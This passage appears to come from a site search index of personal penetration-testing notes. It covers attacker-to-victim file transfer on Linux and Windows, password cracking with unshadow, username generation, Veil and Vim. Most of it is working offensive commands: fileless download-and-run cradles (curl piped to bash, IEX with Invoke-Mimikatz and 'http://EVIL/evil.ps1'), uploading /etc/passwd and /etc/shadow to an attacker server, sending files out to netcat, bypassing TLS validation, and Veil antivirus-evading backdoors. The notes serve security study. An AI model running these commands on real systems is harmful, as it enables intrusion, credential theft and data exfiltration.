    ","tags":["exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/","title":"Transferring files techniques - Linux","text":"","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#replicating-client-server","title":"Replicating client-server","text":"","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#1-setting-up-a-server-in-the-attacking-machine","title":"1. Setting up a server in the attacking machine","text":"

    See different techniques

    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#2-download-files-from-victims-machine","title":"2. Download files from victim's machine","text":"","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#wget","title":"wget","text":"
    wget http://<SERVERIP>:<SERVERPORT>/<file>\n
    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#curl","title":"curl","text":"
    curl http://http://<SERVERIP>:<SERVERPORT>/<file> -o <OutputNameForFile>\n
    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#fileless-downloads-using-linux","title":"Fileless downloads using Linux","text":"

    Because of the way Linux works and how pipes operate, most of the tools we use in Linux can be used to replicate fileless operations, which means that we don't have to download a file to execute it.

    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#fileless-download-with-curl","title":"Fileless Download with cURL","text":"
    curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash\n
    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#fileless-download-with-wget","title":"Fileless Download with wget","text":"
    wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3\n
    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#bash-downloads","title":"Bash downloads","text":"

    On the server side (attacking machine), setup a server by using one of the methodologies applied above.

    On the client side (victim's machine):

    # Connecting to the Target Webserver (attacking machine serving the file)\nexec 3<>/dev/tcp/$ip/80\n\n# Requesting the file to the server \necho -e \"GET /file.sh HTTP/1.1\\n\\n\">&3\n\n# Printing the Response\ncat <&3\n
    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#ssh-downloads-and-uploads-scp","title":"SSH downloads and uploads: SCP","text":"

    SSH implementation comes with an SCP utility for remote file transfer that, by default, uses the SSH protocol.

    Two requirements:

    • we have ssh user credentials on the remote host
    • ssh is open on port 22

    On the server's side (attacker's machine):

    # Enable the service\nsudo systemctl enable ssh\n\n# Start the server\nsudo systemctl start ssh\n\n# Check if port is listening\nnetstat -lnpt\n

    From the attacker machine too:

    # Download file foobar.txt saved in the victim's machin. Command is run from attacker machine connecting to the remote host (victim's machine)\nscp username@$IPvictim:foobar.txt /some/local/directory\n\n# Upload file foo.txt saved in attacker machine into the victim's. Command is run from attacker machine connecting to the remote host (victim's machine)\nscp foo.txt username@$IPvictim:/some/remote/directory\n
    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#base64","title":"Base64","text":"

    To avoid firewall protections we can:

    1. Base64 encode the file:

    base64 file.php -w 0\n\n# Alternative\ncat file |base64 -w 0;echo\n

    2. Copy the base64 string, go to the remote host and decode it and pipe to a file:

    echo -n \"Looooooong-string-encoded-in-base64\" | base64 -d > file.php\n# -n: do not output the trailing newline\n
    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#web-upload","title":"Web upload","text":"

    We can use uploadserver.

    # Install\npython3 -m pip install --user uploadserver\n\n# As we will use https, we will create a self-signed certificate. This file should be hosted in a different location from the web server folder\nopenssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'\n\n# Start the web server\npython3 -m uploadserver 443 --server-certificate /location/different/folder/server.pem\n\n# Now from our compromised machine, let's upload the `/etc/passwd` and `/etc/shadow` files.\ncurl -X POST https://$attackerIP/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure\n# We used the option --insecure because we used a self-signed certificate that we trust.\n
    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-linux/#backdoors","title":"Backdoors","text":"

    See reverse shells, bind shells, and web shells.

    ","tags":["linux","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/","title":"Transferring files techniques - Windows","text":"

    See different techniques to set up a server in the attacking machine, probably a Kali

    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-base64-encode-decode","title":"PowerShell Base64 Encode & Decode","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#upload-from-linux-attacker-to-windows-victim","title":"Upload from linux (attacker) to Windows (victim)","text":"

    If we have access to a terminal, we can encode a file to a base64 string, copy its contents from the terminal and perform the reverse operation, decoding the file in the original content.

    # In attacker machine, check SSH Key MD5 Hash\nmd5sum id_rsa\n\n# In attacker machine, encode SSH Key to Base64\ncat id_rsa |base64 -w 0;echo\n\n\n# Copy output and paste it into the Windows PowerShell terminal in the victim's machine\nPS C:\\lala> [IO.File]::WriteAllBytes(\"C:\\Users\\Public\\id_rsa\", [Convert]::FromBase64String(\"LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFJRUF6WjE0dzV1NU9laHR5SUJQSkg3Tm9Yai84YXNHRUcxcHpJbmtiN2hIMldRVGpMQWRYZE9kCno3YjJtd0tiSW56VmtTM1BUR3ZseGhDVkRRUmpBYzloQ3k1Q0duWnlLM3U2TjQ3RFhURFY0YUtkcXl0UTFUQXZZUHQwWm8KVWh2bEo5YUgxclgzVHUxM2FRWUNQTVdMc2JOV2tLWFJzSk11dTJONkJoRHVmQThhc0FBQUlRRGJXa3p3MjFwTThBQUFBSApjM05vTFhKellRQUFBSUVBeloxNHc1dTVPZWh0eUlCUEpIN05vWGovOGFzR0VHMXB6SW5rYjdoSDJXUVRqTEFkWGRPZHo3CmIybXdLYkluelZrUzNQVEd2bHhoQ1ZEUVJqQWM5aEN5NUNHblp5SzN1Nk40N0RYVERWNGFLZHF5dFExVEF2WVB0MFpvVWgKdmxKOWFIMXJYM1R1MTNhUVlDUE1XTHNiTldrS1hSc0pNdXUyTjZCaER1ZkE4YXNBQUFBREFRQUJBQUFBZ0NjQ28zRHBVSwpFdCtmWTZjY21JelZhL2NEL1hwTlRsRFZlaktkWVFib0ZPUFc5SjBxaUVoOEpyQWlxeXVlQTNNd1hTWFN3d3BHMkpvOTNPCllVSnNxQXB4NlBxbFF6K3hKNjZEdzl5RWF1RTA5OXpodEtpK0pvMkttVzJzVENkbm92Y3BiK3Q3S2lPcHlwYndFZ0dJWVkKZW9VT2hENVJyY2s5Q3J2TlFBem9BeEFBQUFRUUNGKzBtTXJraklXL09lc3lJRC9JQzJNRGNuNTI0S2NORUZ0NUk5b0ZJMApDcmdYNmNoSlNiVWJsVXFqVEx4NmIyblNmSlVWS3pUMXRCVk1tWEZ4Vit0K0FBQUFRUURzbGZwMnJzVTdtaVMyQnhXWjBNCjY2OEhxblp1SWc3WjVLUnFrK1hqWkdqbHVJMkxjalRKZEd4Z0VBanhuZEJqa0F0MExlOFphbUt5blV2aGU3ekkzL0FBQUEKUVFEZWZPSVFNZnQ0R1NtaERreWJtbG1IQXRkMUdYVitOQTRGNXQ0UExZYzZOYWRIc0JTWDJWN0liaFA1cS9yVm5tVHJRZApaUkVJTW84NzRMUkJrY0FqUlZBQUFBRkhCc1lXbHVkR1Y0ZEVCamVXSmxjbk53WVdObEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=\"))\n\n# Confirming the MD5 Hashes Match with  Get-FileHash cmdlet\nPS C:\\lala> Get-FileHash C:\\Users\\Public\\id_rsa -Algorithm md5\n

    More about the Get-FileHash cmdlet.

    Windows Command Line utility (cmd.exe) has a maximum string length of 8,191 characters. Also, a web shell may error if you attempt to send extremely large strings.

    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#download-from-windows-victim-to-linux-attacker","title":"Download from Windows (victim) to linux (attacker)","text":"

    In the victim's machine (windows):

    # Encode File Using PowerShell\n[Convert]::ToBase64String((Get-Content -path \"C:\\Windows\\system32\\drivers\\etc\\hosts\" -Encoding byte))\n\n\nGet-FileHash \"C:\\Windows\\system32\\drivers\\etc\\hosts\" -Algorithm MD5 | select Hash\n

    In the attacker's machine (Linux): We copy this content and paste it into our attack host, use the base64 command to decode it, and use the md5sum application to confirm the transfer happened correctly.

    echo IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbXBsZSBIT1NUUyBmaWxlIHVzZWQgYnkgTWljcm9zb2Z0IFRDUC9JUCBmb3IgV2luZG93cy4NCiMNCiMgVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBtYXBwaW5ncyBvZiBJUCBhZGRyZXNzZXMgdG8gaG9zdCBuYW1lcy4gRWFjaA0KIyBlbnRyeSBzaG91bGQgYmUga2VwdCBvbiBhbiBpbmRpdmlkdWFsIGxpbmUuIFRoZSBJUCBhZGRyZXNzIHNob3VsZA0KIyBiZSBwbGFjZWQgaW4gdGhlIGZpcnN0IGNvbHVtbiBmb2xsb3dlZCBieSB0aGUgY29ycmVzcG9uZGluZyBob3N0IG5hbWUuDQojIFRoZSBJUCBhZGRyZXNzIGFuZCB0aGUgaG9zdCBuYW1lIHNob3VsZCBiZSBzZXBhcmF0ZWQgYnkgYXQgbGVhc3Qgb25lDQojIHNwYWNlLg0KIw0KIyBBZGRpdGlvbmFsbHksIGNvbW1lbnRzIChzdWNoIGFzIHRoZXNlKSBtYXkgYmUgaW5zZXJ0ZWQgb24gaW5kaXZpZHVhbA0KIyBsaW5lcyBvciBmb2xsb3dpbmcgdGhlIG1hY2hpbmUgbmFtZSBkZW5vdGVkIGJ5IGEgJyMnIHN5bWJvbC4NCiMNCiMgRm9yIGV4YW1wbGU6DQojDQojICAgICAgMTAyLjU0Ljk0Ljk3ICAgICByaGluby5hY21lLmNvbSAgICAgICAgICAjIHNvdXJjZSBzZXJ2ZXINCiMgICAgICAgMzguMjUuNjMuMTAgICAgIHguYWNtZS5jb20gICAgICAgICAgICAgICMgeCBjbGllbnQgaG9zdA0KDQojIGxvY2FsaG9zdCBuYW1lIHJlc29sdXRpb24gaXMgaGFuZGxlZCB3aXRoaW4gRE5TIGl0c2VsZi4NCiMJMTI3LjAuMC4xICAgICAgIGxvY2FsaG9zdA0KIwk6OjEgICAgICAgICAgICAgbG9jYWxob3N0DQo= | base64 -d > hosts\n\n\nmd5sum hosts \n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#certutil","title":"Certutil","text":"

    It's possible to download a file with certutil:

    certutil.exe -urlcache -split -f \"https://download.sysinternals.com/files/PSTools.zip\" pstools.zip\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-systemnetwebclient","title":"PowerShell System.Net.WebClient","text":"

    PowerShell offers many file transfer options. In any version of PowerShell, the System.Net.WebClient class can be used to download a file over HTTP, HTTPS or FTP.

    The following table describes WebClient methods for downloading data from a resource:

    Method Description OpenRead Returns the data from a resource as a Stream. OpenReadAsync Returns the data from a resource without blocking the calling thread. DownloadData Downloads data from a resource and returns a Byte array. DownloadDataAsync Downloads data from a resource and returns a Byte array without blocking the calling thread. DownloadFile Downloads data from a resource to a local file. DownloadFileAsync Downloads data from a resource to a local file without blocking the calling thread. DownloadString Downloads a String from a resource and returns a String. DownloadStringAsync Downloads a String from a resource without blocking the calling thread.","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-downloadstring-fileless-method","title":"PowerShell DownloadString - Fileless Method","text":"
    # Example: (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')\nPS C:\\lala> (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\\Users\\Public\\Downloads\\PowerView.ps1')\n# Net.WebClient: class name\n# DownloadFile: method\n\n\n# Example: (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')\nPS C:\\lala> (New-Object Net.WebClient).DownloadFileAsync('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1', 'PowerViewAsync.ps1')\n# Net.WebClient: class name\n# DownloadFileAsync: method\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-downloadstring-fileless-method_1","title":"PowerShell DownloadString - Fileless Method","text":"

    PowerShell can also be used to perform fileless attacks. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the Invoke-Expression cmdlet or the alias IEX.

    PS C:\\lala> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')\n

    IEX also accepts pipeline input.

    PS C:\\lala> (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') | IEX\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-invoke-webrequest","title":"PowerShell Invoke-WebRequest","text":"

    From PowerShell 3.0 onwards, the Invoke-WebRequest cmdlet is also available. This cmdlet gets content from a web page on the internet. We can use the aliases iwr, curl, and wget instead of the Invoke-WebRequest full name.

    Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1\n# alias: `iwr`, `curl`, and `wget`\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#more-downloading-techniques","title":"More downloading techniques","text":"

    From Harmj0y:

    # normal download cradle\nIEX (New-Object Net.Webclient).downloadstring(\"http://EVIL/evil.ps1\")\n\n# PowerShell 3.0+\nIEX (iwr 'http://EVIL/evil.ps1')\n\n# hidden IE com object\n$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r\n\n# Msxml2.XMLHTTP COM object\n$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText\n\n# WinHttp COM object (not proxy aware!)\n$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText\n\n# using bitstransfer- touches disk!\nImport-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\\t;$r=gc $env:temp\\t;rm $env:temp\\t; iex $r\n\n# DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)\n#   code to execute needs to be a base64 encoded string stored in a TXT record\nIEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt \"SERVER\" | Select -Pattern '\"*\"') -split '\"'[0]))))\n\n# from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d\n<#\n<?xml version=\"1.0\"?>\n<command>\n   <a>\n      <execute>Get-Process</execute>\n   </a>\n  </command>\n#>\n$a = New-Object System.Xml.XmlDocument\n$a.Load(\"https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt\")\n$a.command.a.execute | iex\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#bypassing-techniques","title":"Bypassing techniques","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#the-parameter-usebasicparsing","title":"The parameter -UseBasicParsing","text":"

    There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download.

    Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#ssltls-secure-channel","title":"SSL/TLS secure channel","text":"

    Another error in PowerShell downloads is related to the SSL/TLS secure channel if the certificate is not trusted. We can bypass that error with the following command:

    # With this command we get the error Exception calling \"DownloadString\" with \"1\" argument(s): \"The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel.\"\nIEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')\n\n##### To bypass it, first run\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-web-uploads","title":"PowerShell Web Uploads","text":"

    First, we launch a webserver in out attacker machine. We can use uploadserver.

    # Install a Configured WebServer with Upload\npip3 install uploadserver\n\n# Run web server\npython3 -m uploadserver\n

    From the victim's machine (windows), we will upload the file with Invoke-WebRequest:

    # PowerShell Script to Upload a File to Python Upload Server\nIEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')\n\nInvoke-FileUpload -Uri http://$ipServer:8000/upload -File C:\\Windows\\System32\\drivers\\etc\\hosts\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-base64-web-upload","title":"PowerShell Base64 Web Upload","text":"

    Another way to use PowerShell and base64 encoded files for upload operations is by using Invoke-WebRequest or Invoke-RestMethod together with Netcat.

    $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\\Windows\\System32\\drivers\\etc\\hosts' -Encoding Byte))\n\nInvoke-WebRequest -Uri http://$ipServer:8000/ -Method POST -Body $b64\n

    From the attacker machine:

    # We catch the base64 data with Netcat and use the base64 application with the decode option to convert the string to the file.\nnc -lvnp 8000\n\necho <base64> | base64 -d -w 0 > hosts\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#smb-downloads","title":"SMB Downloads","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#simple-smbserver","title":"Simple SMBserver","text":"

    From attacker machine, we can use smbserver.py:

    # First, we create an SMB server in our attacker machine (linux) with smbserver from Impacket \n\nsudo impacket-smbserver share -smb2support /tmp/smbshare\n

    From the windows machine, the victim's, copy the File from the SMB Server

    copy \\\\$ipServer\\share\\nc.exe\n

    If blocked because of organization's security policies blocking unauthenticated guest access, create the SMBserver with username and password.

    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#smbserver-with-authentication","title":"SMBServer with authentication","text":"

    From attacker machine, we can use smbserver.py:

    sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test\n

    From victim's machine, the windows one:

    # mount the SMB Server with Username and Password\nnet use n: \\\\$ipServer\\share /user:test test\n\n# Copy the file\ncopy n:\\nc.exe\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#smb-uploads","title":"SMB Uploads","text":"

    Commonly enterprises don't allow the SMB protocol (TCP/445) out of their internal network because this can open them up to potential attacks.

    An alternative is to run SMB over HTTP with WebDav. WebDAV is an extension of HTTP, the internet protocol that web browsers and web servers use to communicate with each other. The WebDAV protocol enables a webserver to behave like a fileserver, supporting collaborative content authoring. WebDAV can also use HTTPS.

    When you use SMB, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will try to connect using HTTP.

    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#configuring-webdav-server","title":"Configuring WebDav Server","text":"

    To set up our WebDav server, we need to install two Python modules, wsgidav and cheroot.

    pip install wsgidav cheroot\n
    sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous \n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#connect-to-the-server-and-the-share-from-windows","title":"Connect to the server and the share from windows","text":"

    Now we can attempt to connect to the share using the DavWWWRoot directory.

    # DavWWWRoot is a special keyword recognized by the Windows Shell. No such folder exists on your WebDAV server. \nC:\\lala> dir \\\\$ipServer\\DavWWWRoot\n\n# Upload files with SMB\ncopy C:\\Users\\john\\Desktop\\SourceCode.zip \\\\$ipServer\\DavWWWRoot\\\n

    If there are no SMB (TCP/445) restrictions, you can use impacket-smbserver the same way we set it up for download operations.

    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#ftp-downloads","title":"FTP Downloads","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#pyftpdlib-module","title":"pyftpdlib module","text":"

    Configure an FTP Server in our attack host using Python3 pyftpdlib module:

    sudo pip3 install pyftpdlib\n

    Then we can specify port number 21 because, by default, pyftpdlib uses port 2121. Anonymous authentication is enabled by default if we don't set a user and password.

    sudo python3 -m pyftpdlib --port 21\n

    We can use the FTP client or PowerShell Net.WebClient to download files from an FTP server.

    (New-Object Net.WebClient).DownloadFile('ftp://$ipServer/file.txt', 'ftp-file.txt')\n

    When we get a shell on a remote machine, we may not have an interactive shell. Example:

    C:\\htb> echo open 192.168.49.128 > ftpcommand.txt\nC:\\htb> echo USER anonymous >> ftpcommand.txt\nC:\\htb> echo binary >> ftpcommand.txt\nC:\\htb> echo GET file.txt >> ftpcommand.txt\nC:\\htb> echo bye >> ftpcommand.txt\nC:\\htb> ftp -v -n -s:ftpcommand.txt\nftp> open 192.168.49.128\nLog in with USER and PASS first.\nftp> USER anonymous\n\nftp> GET file.txt\nftp> bye\n\nC:\\htb>more file.txt\nThis is a test file\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#ftp-uploads","title":"FTP Uploads","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#run-pyftpdlib-a-ftp-server","title":"Run pyftpdlib, a FTP server","text":"

    We will use module pyftpdlib, with the option --write to allow clients to upload files to our attack host.

    sudo python3 -m pyftpdlib --port 21 --write\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-upload-file","title":"PowerShell Upload File","text":"
    (New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\\Windows\\System32\\drivers\\etc\\hosts')\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#create-a-command-file-for-the-ftp-client-to-upload-a-file","title":"Create a Command File for the FTP Client to Upload a File","text":"

    Example:

    C:\\htb> echo open 192.168.49.128 > ftpcommand.txt\nC:\\htb> echo USER anonymous >> ftpcommand.txt\nC:\\htb> echo binary >> ftpcommand.txt\nC:\\htb> echo PUT c:\\windows\\system32\\drivers\\etc\\hosts >> ftpcommand.txt\nC:\\htb> echo bye >> ftpcommand.txt\nC:\\htb> ftp -v -n -s:ftpcommand.txt\nftp> open 192.168.49.128\n\nLog in with USER and PASS first.\n\n\nftp> USER anonymous\nftp> PUT c:\\windows\\system32\\drivers\\etc\\hosts\nftp> bye\n
    ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"unshadow/","title":"unshadow","text":"

    unshadow - combines passwd and shadow files

    ","tags":["bash"]},{"location":"unshadow/#brute-forcing-etcpasswd-and-etcshadow","title":"Brute forcing /etc/passwd and /etc/shadow","text":"

    First, save /etc/passwd and john /etc/shadow from the victim machine to the attacker machine.

    Second, use unshadow to put users and passwords in the same file:

    unshadow passwd shadow > crackme\n# passwd: file saved with /etc/passwd content.\n# shadow: file saved with /etc/shadow content.\n

    Third, run johtheripper or hashcat to crack the hash.

    ","tags":["bash"]},{"location":"uploadserver/","title":"uploadserver","text":"

    Python's http.server extended to include a file upload page

    ","tags":["file transfer technique","server"]},{"location":"uploadserver/#installation","title":"Installation","text":"

    Download from github repo: https://github.com/Densaugeo/uploadserver.

    python3 -m pip install --user uploadserver\n
    ","tags":["file transfer technique","server"]},{"location":"uploadserver/#basic-usage","title":"Basic usage","text":"
    python3 -m uploadserver\n

    Accepts the same options as http.server. After the server starts, the upload page is at /upload. For example, if the server is running at http://localhost:8000/ go to http://localhost:8000/upload .

    Now supports uploading multiple files at once! Select multiple files in the web page's file selector, or upload with cURL:

    curl -X POST http://127.0.0.1:8000/upload -F 'files=@multiple-example-1.txt' -F 'files=@multiple-example-2.txt'\n

    See an example in File Transfer techniques for Linux.

    ","tags":["file transfer technique","server"]},{"location":"username-anarchy/","title":"Username Anarchy","text":"

    Ruby-based tool for generating usernames.

    This is useful for user account/password brute force guessing and username enumeration when usernames are based on the users' names. By attempting a few weak passwords across a large set of user accounts, user account lockout thresholds can be avoided.

    "},{"location":"username-anarchy/#installation","title":"Installation","text":"

    Download from github repo: https://github.com/urbanadventurer/username-anarchy.

    git clone https://github.com/urbanadventurer/username-anarchy.git\n
    "},{"location":"username-anarchy/#basic-usage","title":"Basic usage","text":"
    cd username-anarchy\n./username-anarchy -i /home/ltnbob/realneames.txt \n
    "},{"location":"veil/","title":"veil","text":"","tags":["pentesting","web pentesting"]},{"location":"veil/#installation","title":"Installation","text":"

    Repository: https://github.com/Veil-Framework/Veil/

    Quick install for kali:

    apt update\napt install -y veil\n/usr/share/veil/config/setup.sh --force --silent\n

    To run veil:

    veil\n
    ","tags":["pentesting","web pentesting"]},{"location":"veil/#usage-and-basic-command","title":"Usage and basic command","text":"

    Tool \"Evasion\" creates undetectable backdoors.

    \"Ordenance\" is the payload part that we will launch to this backdoor.

    Reading list:

    • https://www.zonasystem.com/2020/07/shellter-veil-evasion-evasion-de-antivirus-ocultando-shellcodes-de-binarios.html
    • https://www.hackingloops.com/veil-evasion-virustotal/---

    One nice thing about veil is that it provides a metasploit RC file, meaning that in order to launch the multihandler you just need to run:

    msfconsole -r path/to/metasploitRCfile\n
    ","tags":["pentesting","web pentesting"]},{"location":"vim/","title":"Vim - A text editor","text":""},{"location":"vim/#open-a-file","title":"Open a file","text":"

    To edit a new file.

    nvim <file>\n

    Open a file in a recovery mode:

    nvim -r <file>\n
    "},{"location":"vim/#go-to-insert-mode","title":"Go to INSERT mode","text":"

    To enter into edit mode, press Supr twice and start writting

    • a : Cursor after the character.
    • i : Cursor before the character.
    • A : Cursor at the end of the line.
    • I : Cursor at the beginning of the line.

    To get out of INSERT mode, press ESC.

    "},{"location":"vim/#browsing-the-file-in-cursor-mode","title":"Browsing the file in CURSOR mode","text":"
    • 2: Go to line 2 of the file.
    • gg: Go to line 1 of the file.
    • G : Go to last line.
    • G : Go to line n.
    • 0 : Go to the beginning of line.
    • $ : Go to the end of line.
    • "},{"location":"vim/#delete-cut-in-cursor-mode","title":"Delete (cut) in CURSOR mode","text":"

      There is no delete in CURSOR mode. What it does is to CUT the content. There is also no need to enter into the INSERT mode to remove some text. You can delete text in the CURSOR mode with these keys:

      • x : Cut character.
      • dd : Cut full line.
      • dw : Cut word.
      • d$ : Cut from the cursor position to the end of line.
      • dw : Cut n words from cursor position. For instance, \"d3w\" cuts three words.
      • dd : Cut n lines from cursor position. For instance, \"d4d\" cuts four lines.
      • ciw : Cut word no matter cursor position. Also no matter it word was in parathesis or \"\".
      • yw: Copy word.
      • yy: Copy full line.
      • Tip: We can multiply any command to run multiple times by adding a number before it. For example, '4yw' would copy 4 words instead of one, and so on.

        "},{"location":"vim/#select-text","title":"Select text","text":"

        To select a content in CURSOR mode you need to change to VISUAL mode.

        • v : Changes from CURSOR mode to VISUAL mode.
        • V : Changes from CURSOR mode to VISUAL mode AND select the line where the cursor was.

        Being in VISUAL mode you can:

        • Select lines with cursor position (Up and Down arrows).
        • w : Select a word.
        "},{"location":"vim/#replace-in-cursor-mode","title":"Replace in CURSOR mode","text":"
        • R : Insert the text you want and it replaces the existing one.
        "},{"location":"vim/#copy-in-cursor-mode","title":"Copy in CURSOR mode","text":"

        To copy into the clip:

        • y : Copy selected content into the clip.
        "},{"location":"vim/#paste-in-cursor-mode","title":"Paste in CURSOR mode","text":"

        Everything you delete goes to the clip. To paste in CURSOR mode, press key:

        • p : Paste clip in the next line.
        • P : Paste clip in previous line.
        "},{"location":"vim/#insert-a-line-in-cursor-mode","title":"Insert a line in CURSOR mode","text":"

        Press these keys:

        • o : Add a line under cursor position.
        • O : Add a line before cursor position.
        "},{"location":"vim/#undo-and-redo-changes-in-cursor-mode","title":"Undo and Redo changes in CURSOR mode","text":"

        You can do and undo changes from CURSOR mode with these keys:

        • u : Undo changes.
        • r : Redo changes.
        "},{"location":"vim/#close-a-file","title":"Close a file","text":"

        There were no modifications. Close it without save it:

        # Press Esc key to enter CURSOR mode.\n:q\n# Hit ENTER\n

        There were modifications but you don't want to save it:

        # Press Esc key to enter CURSOR mode.\n:q!\n# Hit ENTER\n
        "},{"location":"vim/#save-a-file","title":"Save a file","text":"

        To save the file and continue editing:

        # Press Esc key to enter CURSOR mode.\n:w\n# Hit ENTER\n

        To save the file and quit the editor:

        # Press Esc key to enter CURSOR mode.\n:wq!\n# Hit ENTER\n

        Also, you can:

